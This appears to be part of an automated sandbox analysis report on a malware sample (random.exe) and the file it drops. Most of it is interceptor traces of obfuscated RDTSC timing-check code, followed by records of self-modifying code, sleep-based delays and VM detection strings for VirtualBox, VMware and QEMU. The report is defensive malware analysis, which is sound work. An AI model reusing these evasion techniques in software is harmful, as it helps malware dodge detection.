            Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 4A40CE0 second address: 4A40CE6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 4A40CE6 second address: 4A40CEA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 4A40CEA second address: 4A40D04 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pop ebp 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007F6B8D266C3Fh 0x00000010 rdtsc
            Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 4A506F7 second address: 4A507CD instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov bl, 09h 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push FFFFFFFEh 0x0000000a pushad 0x0000000b mov esi, ebx 0x0000000d pushfd 0x0000000e jmp 00007F6B8CF111A7h 0x00000013 sub al, FFFFFF9Eh 0x00000016 jmp 00007F6B8CF111A9h 0x0000001b popfd 0x0000001c popad 0x0000001d push 14452897h 0x00000022 pushad 0x00000023 pushfd 0x00000024 jmp 00007F6B8CF1119Dh 0x00000029 or ch, FFFFFFD6h 0x0000002c jmp 00007F6B8CF111A1h 0x00000031 popfd 0x00000032 mov di, ax 0x00000035 popad 0x00000036 add dword ptr [esp], 62DB9781h 0x0000003d jmp 00007F6B8CF1119Ah 0x00000042 push 0B0ABA5Bh 0x00000047 pushad 0x00000048 mov di, 49C2h 0x0000004c pushfd 0x0000004d jmp 00007F6B8CF111A3h 0x00000052 xor ecx, 772EC8BEh 0x00000058 jmp 00007F6B8CF111A9h 0x0000005d popfd 0x0000005e popad 0x0000005f xor dword ptr [esp], 7C1D145Bh 0x00000066 push eax 0x00000067 push edx 0x00000068 jmp 00007F6B8CF1119Dh 0x0000006d rdtsc
            Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 4A507CD second address: 4A5083D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov cx, bx 0x00000006 mov eax, edi 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov eax, dword ptr fs:[00000000h] 0x00000011 pushad 0x00000012 jmp 00007F6B8D266C3Bh 0x00000017 pushfd 0x00000018 jmp 00007F6B8D266C48h 0x0000001d or al, 00000048h 0x00000020 jmp 00007F6B8D266C3Bh 0x00000025 popfd 0x00000026 popad 0x00000027 nop 0x00000028 pushad 0x00000029 pushad 0x0000002a mov di, AA24h 0x0000002e popad 0x0000002f popad 0x00000030 push eax 0x00000031 jmp 00007F6B8D266C49h 0x00000036 nop 0x00000037 push eax 0x00000038 push edx 0x00000039 push eax 0x0000003a push edx 0x0000003b pushad 0x0000003c popad 0x0000003d rdtsc
            Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 4A5083D second address: 4A50843 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 4A50843 second address: 4A5084B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 movzx eax, bx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
            Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 4A5084B second address: 4A50876 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 sub esp, 1Ch 0x0000000a pushad 0x0000000b mov di, EBAAh 0x0000000f mov si, bx 0x00000012 popad 0x00000013 push edx 0x00000014 jmp 00007F6B8CF1119Ah 0x00000019 mov dword ptr [esp], ebx 0x0000001c push eax 0x0000001d push edx 0x0000001e pushad 0x0000001f mov eax, ebx 0x00000021 mov bx, E2ACh 0x00000025 popad 0x00000026 rdtsc
            Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 4A50876 second address: 4A5087B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
            Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 4A5087B second address: 4A508B7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 jmp 00007F6B8CF111A8h 0x0000000d mov dword ptr [esp], esi 0x00000010 push eax 0x00000011 push edx 0x00000012 jmp 00007F6B8CF111A7h 0x00000017 rdtsc
            Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 4A508B7 second address: 4A508D6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F6B8D266C3Fh 0x00000008 movzx ecx, di 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 push eax 0x00000012 push edx 0x00000013 pushad 0x00000014 popad 0x00000015 rdtsc
            Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 4A508D6 second address: 4A508F3 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6B8CF111A9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
            Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 4A508F3 second address: 4A508F9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 4A508F9 second address: 4A50945 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [esp], edi 0x0000000b jmp 00007F6B8CF1119Fh 0x00000010 mov eax, dword ptr [7722B370h] 0x00000015 push eax 0x00000016 push edx 0x00000017 pushad 0x00000018 pushfd 0x00000019 jmp 00007F6B8CF1119Bh 0x0000001e and al, FFFFFFDEh 0x00000021 jmp 00007F6B8CF111A9h 0x00000026 popfd 0x00000027 popad 0x00000028 rdtsc
            Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 4A50945 second address: 4A50960 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6B8D266C3Ch 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xor dword ptr [ebp-08h], eax 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f push ebx 0x00000010 pop esi 0x00000011 push ebx 0x00000012 pop ecx 0x00000013 popad 0x00000014 rdtsc
            Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 4A50960 second address: 4A50983 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov esi, 7F08E487h 0x00000008 push ecx 0x00000009 pop edx 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d xor eax, ebp 0x0000000f push eax 0x00000010 push edx 0x00000011 jmp 00007F6B8CF111A2h 0x00000016 rdtsc
            Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 4A50983 second address: 4A509C4 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6B8D266C3Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 nop 0x0000000a pushad 0x0000000b mov ecx, 4101BA7Bh 0x00000010 pushfd 0x00000011 jmp 00007F6B8D266C40h 0x00000016 adc eax, 1114CFC8h 0x0000001c jmp 00007F6B8D266C3Bh 0x00000021 popfd 0x00000022 popad 0x00000023 push eax 0x00000024 push eax 0x00000025 push edx 0x00000026 push eax 0x00000027 push edx 0x00000028 pushad 0x00000029 popad 0x0000002a rdtsc
            Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 4A509C4 second address: 4A509CA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 4A509CA second address: 4A509D0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 4A509D0 second address: 4A509D4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 4A509D4 second address: 4A50A20 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 nop 0x00000009 jmp 00007F6B8D266C3Bh 0x0000000e lea eax, dword ptr [ebp-10h] 0x00000011 jmp 00007F6B8D266C46h 0x00000016 mov dword ptr fs:[00000000h], eax 0x0000001c push eax 0x0000001d push edx 0x0000001e jmp 00007F6B8D266C47h 0x00000023 rdtsc
            Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 4A50A20 second address: 4A50A69 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edi 0x00000004 pop esi 0x00000005 movsx edi, si 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov esi, dword ptr [ebp+08h] 0x0000000e jmp 00007F6B8CF1119Ah 0x00000013 mov eax, dword ptr [esi+10h] 0x00000016 pushad 0x00000017 mov bh, ch 0x00000019 mov ecx, ebx 0x0000001b popad 0x0000001c test eax, eax 0x0000001e pushad 0x0000001f movsx ebx, si 0x00000022 mov si, 9963h 0x00000026 popad 0x00000027 jne 00007F6BFF5F046Eh 0x0000002d push eax 0x0000002e push edx 0x0000002f jmp 00007F6B8CF111A5h 0x00000034 rdtsc
            Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 4A50A69 second address: 4A50A6E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
            Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 4A50A6E second address: 4A50AAC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 mov ecx, ebx 0x00000006 popad 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov eax, 00000000h 0x0000000e jmp 00007F6B8CF111A4h 0x00000013 mov dword ptr [ebp-20h], eax 0x00000016 push eax 0x00000017 push edx 0x00000018 jmp 00007F6B8CF111A7h 0x0000001d rdtsc
            Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 4A50AAC second address: 4A50AEA instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6B8D266C49h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov ebx, dword ptr [esi] 0x0000000b jmp 00007F6B8D266C3Eh 0x00000010 mov dword ptr [ebp-24h], ebx 0x00000013 push eax 0x00000014 push edx 0x00000015 push eax 0x00000016 push edx 0x00000017 jmp 00007F6B8D266C3Ah 0x0000001c rdtsc
            Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 4A50AEA second address: 4A50AF0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 4A50AF0 second address: 4A50B51 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F6B8D266C3Ch 0x00000009 and si, A528h 0x0000000e jmp 00007F6B8D266C3Bh 0x00000013 popfd 0x00000014 mov dh, al 0x00000016 popad 0x00000017 pop edx 0x00000018 pop eax 0x00000019 test ebx, ebx 0x0000001b pushad 0x0000001c mov cx, dx 0x0000001f mov bl, 2Ah 0x00000021 popad 0x00000022 je 00007F6BFF945D94h 0x00000028 pushad 0x00000029 push esi 0x0000002a mov esi, ebx 0x0000002c pop edi 0x0000002d pushfd 0x0000002e jmp 00007F6B8D266C3Ah 0x00000033 or eax, 32B632B8h 0x00000039 jmp 00007F6B8D266C3Bh 0x0000003e popfd 0x0000003f popad 0x00000040 cmp ebx, FFFFFFFFh 0x00000043 push eax 0x00000044 push edx 0x00000045 push eax 0x00000046 push edx 0x00000047 pushad 0x00000048 popad 0x00000049 rdtsc
            Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 4A50B51 second address: 4A50B6C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6B8CF111A7h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
            Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 4A3039A second address: 4A303E5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 call 00007F6B8D266C47h 0x00000008 pop eax 0x00000009 pushfd 0x0000000a jmp 00007F6B8D266C49h 0x0000000f jmp 00007F6B8D266C3Bh 0x00000014 popfd 0x00000015 popad 0x00000016 pop edx 0x00000017 pop eax 0x00000018 xchg eax, ebp 0x00000019 push eax 0x0000001a push edx 0x0000001b push eax 0x0000001c push edx 0x0000001d push eax 0x0000001e push edx 0x0000001f rdtsc
            Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 4A303E5 second address: 4A303E9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 4A303E9 second address: 4A303ED instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 4A303ED second address: 4A303F3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 4A303F3 second address: 4A30488 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6B8D266C3Ah 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a pushad 0x0000000b push ebx 0x0000000c pushad 0x0000000d popad 0x0000000e pop ecx 0x0000000f pushad 0x00000010 pushad 0x00000011 popad 0x00000012 jmp 00007F6B8D266C3Fh 0x00000017 popad 0x00000018 popad 0x00000019 xchg eax, ebp 0x0000001a pushad 0x0000001b pushfd 0x0000001c jmp 00007F6B8D266C44h 0x00000021 xor cx, 1D78h 0x00000026 jmp 00007F6B8D266C3Bh 0x0000002b popfd 0x0000002c jmp 00007F6B8D266C48h 0x00000031 popad 0x00000032 mov ebp, esp 0x00000034 jmp 00007F6B8D266C40h 0x00000039 pop ebp 0x0000003a push eax 0x0000003b push edx 0x0000003c jmp 00007F6B8D266C47h 0x00000041 rdtsc
            Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 4A30488 second address: 4A3048E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 4A3048E second address: 4A30492 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
            Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeRDTSC instruction interceptor: First address: DDDBDB second address: DDDBDF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
            Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeRDTSC instruction interceptor: First address: DDDBDF second address: DDDBF6 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6B8D266C41h 0x00000007 push edi 0x00000008 pop edi 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
            Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeRDTSC instruction interceptor: First address: DDDEB5 second address: DDDECB instructions: 0x00000000 rdtsc 0x00000002 jo 00007F6B8CF11196h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b push ebx 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f pop eax 0x00000010 jbe 00007F6B8CF11196h 0x00000016 rdtsc
            Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeRDTSC instruction interceptor: First address: DDDECB second address: DDDECF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
            Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeRDTSC instruction interceptor: First address: DDE1AD second address: DDE1DC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 push eax 0x00000006 push edx 0x00000007 jmp 00007F6B8CF111A2h 0x0000000c jmp 00007F6B8CF111A6h 0x00000011 rdtsc
            Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeRDTSC instruction interceptor: First address: DDE1DC second address: DDE1E6 instructions: 0x00000000 rdtsc 0x00000002 jp 00007F6B8D266C36h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
            Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeRDTSC instruction interceptor: First address: DDE1E6 second address: DDE1EB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
            Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeRDTSC instruction interceptor: First address: DDE1EB second address: DDE1F1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
            Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeRDTSC instruction interceptor: First address: DDE362 second address: DDE368 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 rdtsc
            Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeRDTSC instruction interceptor: First address: DE11FE second address: DE1279 instructions: 0x00000000 rdtsc 0x00000002 jno 00007F6B8D266C36h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edi 0x0000000b push eax 0x0000000c jp 00007F6B8D266C4Ah 0x00000012 jmp 00007F6B8D266C44h 0x00000017 nop 0x00000018 push 00000000h 0x0000001a push eax 0x0000001b call 00007F6B8D266C38h 0x00000020 pop eax 0x00000021 mov dword ptr [esp+04h], eax 0x00000025 add dword ptr [esp+04h], 0000001Ch 0x0000002d inc eax 0x0000002e push eax 0x0000002f ret 0x00000030 pop eax 0x00000031 ret 0x00000032 cmc 0x00000033 mov esi, dword ptr [ebp+122D3B19h] 0x00000039 push 00000000h 0x0000003b mov esi, dword ptr [ebp+122D17DBh] 0x00000041 call 00007F6B8D266C3Fh 0x00000046 mov cl, bl 0x00000048 pop edi 0x00000049 push CC4441C1h 0x0000004e push ebx 0x0000004f pushad 0x00000050 jnl 00007F6B8D266C36h 0x00000056 push eax 0x00000057 push edx 0x00000058 rdtsc
            Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeRDTSC instruction interceptor: First address: DE1279 second address: DE12CE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop ebx 0x00000006 add dword ptr [esp], 33BBBEBFh 0x0000000d push 00000003h 0x0000000f push 00000000h 0x00000011 push edx 0x00000012 call 00007F6B8CF11198h 0x00000017 pop edx 0x00000018 mov dword ptr [esp+04h], edx 0x0000001c add dword ptr [esp+04h], 00000019h 0x00000024 inc edx 0x00000025 push edx 0x00000026 ret 0x00000027 pop edx 0x00000028 ret 0x00000029 mov edi, 6479968Ch 0x0000002e push 00000000h 0x00000030 cmc 0x00000031 or edi, dword ptr [ebp+122D2BDDh] 0x00000037 push 00000003h 0x00000039 js 00007F6B8CF1119Ah 0x0000003f push esi 0x00000040 pushad 0x00000041 popad 0x00000042 pop esi 0x00000043 push 66E4EC14h 0x00000048 push eax 0x00000049 push edx 0x0000004a push eax 0x0000004b push ecx 0x0000004c pop ecx 0x0000004d pop eax 0x0000004e rdtsc
            Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeRDTSC instruction interceptor: First address: DE1391 second address: DE13C5 instructions: 0x00000000 rdtsc 0x00000002 je 00007F6B8D266C36h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b mov dword ptr [esp], eax 0x0000000e mov esi, 60A09305h 0x00000013 push 00000000h 0x00000015 add edx, 0F77EA41h 0x0000001b call 00007F6B8D266C39h 0x00000020 push ecx 0x00000021 je 00007F6B8D266C38h 0x00000027 push esi 0x00000028 pop esi 0x00000029 pop ecx 0x0000002a push eax 0x0000002b push eax 0x0000002c push edx 0x0000002d push ecx 0x0000002e push eax 0x0000002f push edx 0x00000030 rdtsc
            Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeRDTSC instruction interceptor: First address: DE13C5 second address: DE13CA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 rdtsc
            Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeRDTSC instruction interceptor: First address: DE13CA second address: DE13D4 instructions: 0x00000000 rdtsc 0x00000002 jc 00007F6B8D266C3Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
            Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeRDTSC instruction interceptor: First address: DE13D4 second address: DE1402 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 mov eax, dword ptr [esp+04h] 0x0000000a push ebx 0x0000000b jmp 00007F6B8CF111A6h 0x00000010 pop ebx 0x00000011 mov eax, dword ptr [eax] 0x00000013 push eax 0x00000014 push edx 0x00000015 push esi 0x00000016 jnl 00007F6B8CF11196h 0x0000001c pop esi 0x0000001d rdtsc
            Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeRDTSC instruction interceptor: First address: DE1402 second address: DE1407 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
            Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeRDTSC instruction interceptor: First address: DE161B second address: DE1673 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 add dword ptr [esp], 7C90D971h 0x0000000c adc dl, 00000063h 0x0000000f push 00000003h 0x00000011 mov cx, 7110h 0x00000015 push 00000000h 0x00000017 mov edi, edx 0x00000019 push 00000003h 0x0000001b xor dword ptr [ebp+122D2BD6h], ecx 0x00000021 call 00007F6B8CF11199h 0x00000026 pushad 0x00000027 jl 00007F6B8CF11198h 0x0000002d push eax 0x0000002e pop eax 0x0000002f js 00007F6B8CF11198h 0x00000035 pushad 0x00000036 popad 0x00000037 popad 0x00000038 push eax 0x00000039 push esi 0x0000003a jmp 00007F6B8CF1119Ch 0x0000003f pop esi 0x00000040 mov eax, dword ptr [esp+04h] 0x00000044 pushad 0x00000045 push edi 0x00000046 push esi 0x00000047 pop esi 0x00000048 pop edi 0x00000049 push eax 0x0000004a push edx 0x0000004b push eax 0x0000004c push edx 0x0000004d rdtsc
            Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeRDTSC instruction interceptor: First address: DE1673 second address: DE1677 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
            Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeRDTSC instruction interceptor: First address: DE1677 second address: DE169C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 mov eax, dword ptr [eax] 0x00000009 pushad 0x0000000a pushad 0x0000000b jno 00007F6B8CF11196h 0x00000011 jmp 00007F6B8CF1119Bh 0x00000016 popad 0x00000017 push eax 0x00000018 push edx 0x00000019 jng 00007F6B8CF11196h 0x0000001f rdtsc
            Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeRDTSC instruction interceptor: First address: E0068F second address: E00697 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 push edx 0x00000005 pop edx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
            Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeRDTSC instruction interceptor: First address: DFEAD7 second address: DFEAF5 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6B8CF111A4h 0x00000007 jnc 00007F6B8CF11196h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f rdtsc
            Source: C:\Users\user\Desktop\random.exeSpecial instruction interceptor: First address: 6A2DC6 instructions caused by: Self-modifying code
            Source: C:\Users\user\Desktop\random.exeSpecial instruction interceptor: First address: 6A2D0F instructions caused by: Self-modifying code
            Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeSpecial instruction interceptor: First address: C62DC6 instructions caused by: Self-modifying code
            Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeSpecial instruction interceptor: First address: C62D0F instructions caused by: Self-modifying code
            Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeRegistry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDescJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeRegistry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersionJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeRegistry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersionJump to behavior
            Source: C:\Users\user\Desktop\random.exeCode function: 0_2_04A703A7 rdtsc 0_2_04A703A7
            Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeWindow / User API: threadDelayed 368Jump to behavior
            Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeWindow / User API: threadDelayed 2446Jump to behavior
            Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BLNS00AZ\random[1].exeJump to dropped file
            Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\10362200101\aae6fb6455.exeJump to dropped file
            Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe TID: 5420Thread sleep count: 48 > 30Jump to behavior
            Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe TID: 5420Thread sleep time: -96048s >= -30000sJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe TID: 6912Thread sleep count: 56 > 30Jump to behavior
            Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe TID: 6912Thread sleep time: -112056s >= -30000sJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe TID: 3228Thread sleep count: 368 > 30Jump to behavior
            Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe TID: 3228Thread sleep time: -11040000s >= -30000sJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe TID: 60Thread sleep count: 2446 > 30Jump to behavior
            Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe TID: 60Thread sleep time: -4894446s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\random.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeThread delayed: delay time: 30000Jump to behavior
            Source: random.exe, random.exe, 00000000.00000002.1269151253.0000000000827000.00000040.00000001.01000000.00000003.sdmp, rapes.exe, rapes.exe, 00000002.00000002.1297950338.0000000000DE7000.00000040.00000001.01000000.00000007.sdmpBinary or memory string: HARDWARE\ACPI\DSDT\VBOX__
            Source: random.exe, 00000000.00000003.1242187103.0000000000D2C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\
            Source: random.exe, 00000000.00000003.1242187103.0000000000D2C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\\?\Volume{a33c736e-61ca-11ee-8c18-806e6f6e6963}\
            Source: random.exe, rapes.exe.0.drBinary or memory string: QEMu{
